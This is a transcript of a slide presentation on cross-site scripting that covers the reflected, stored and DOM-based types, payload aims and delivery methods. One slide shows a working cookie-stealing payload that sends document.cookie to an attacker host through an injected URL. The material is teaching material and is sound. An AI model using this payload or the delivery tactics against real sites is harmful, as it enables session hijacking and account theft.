Presentation is loading. Please wait.

Presentation is loading. Please wait.

Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.

Published byFrederick Lester Modified over 9 years ago

Similar presentations

Presentation on theme: "Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected."— Presentation transcript:

1 Presented By: Chandra Kollipara

2 Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user

3 “Users get compromised because they are not security-conscious” “You can’t own a web application via XSS.”

4 Types of XSS: Reflected Stored DOM-based

5 Reflected XSS: http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred

6 http://mdsec.net/error/5/Error.ashx?message= alert(1)

7 Exploiting the vulnerability

8 http://mdsec.net/error/5/Error.ashx?message= var+i=new+Image;+i.src=”http://mdattacker.net/”%2 bdocument.cookie; var i=new Image; i.src=”http://mdattacker.net/”+ document.cookie;

9 Q. Why doesn’t the attacker simply host a malicious script on mdattacker.net and feed the user a direct link to this script?

10 Stored XSS Vulnerability: Data submitted by one user is stored in the application (typically in a back-end database) and then is displayed to other users without being filtered or sanitized appropriately. It involves two requests: The attacker posts some crafted data containing malicious code that the application stores. A victim views a page containing the attacker’s data, and the malicious code is executed when the script is executed in the victim’s browser.

11

12 DOM-based XSS Vulnerability: DOM-based XSS vulnerabilities are more similar to reflected XSS bugs than to stored XSS bugs. Their exploitation typically involves an attacker’s inducing a user to access a crafted URL containing malicious code. The server’s response to that specific request causes the malicious code to be executed.

13

14 XSS Attacks in Action: In 2010, the Apache Foundation was compromised via a refl ected XSS attack within its issue-tracking application. http://blogs.apache.org/infra/entry/apache_org_04_09_2010 In 2005, the social networking site MySpace was found to be vulnerable to a stored XSS attack. http://namb.la/popular/tech.html In 2009, Twitter fell victim to two XSS worms. www.cgisecurity.com/2009/04/two-xss-worms-slam-twitter.html http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong- fix-andsomething.html

15 Payload for XSS Attacks: It involves capturing a victim’s session token, hijacking her session, and thereby making use of the application “as” the victim, performing arbitrary actions and potentially taking ownership of that user’s account. Virtual Defacement Injecting Trojan Functionality Inducing user actions

16 Virtual Defacement

17 Injecting Trojan functionality

18 Delivery Mechanisms In a targeted attack, a forged e-mail may be sent to a single target user or a small number of users A URL can be fed to a target user in an instant message. Content and code on third-party websites can be used to generate requests that trigger XSS flaws Many web applications implement a function to “tell a friend” or send feedback to site administrators.

19 For Stored XSS: The two kinds of delivery mechanisms for stored XSS attacks are in-band and out-of-band. In-band delivery applies in most cases and is used when the data that is the subject of the vulnerability is supplied to the application via its main web interface. Out-of-band delivery applies in cases where the data that is the subject of the vulnerability is supplied to the application through some other channel

20 Thank You Questions?

Download ppt "Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.

Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.

Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Ben Livshits and Weidong Cui Microsoft Research Redmond, WA.

Ben Livshits and Weidong Cui Microsoft Research Redmond, WA.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
March Intensive: XSS Exploits

March Intensive: XSS Exploits
Exploits: XSS, SQLI, Buffer Overflow

Exploits: XSS, SQLI, Buffer Overflow

Similar presentations

Ads by Google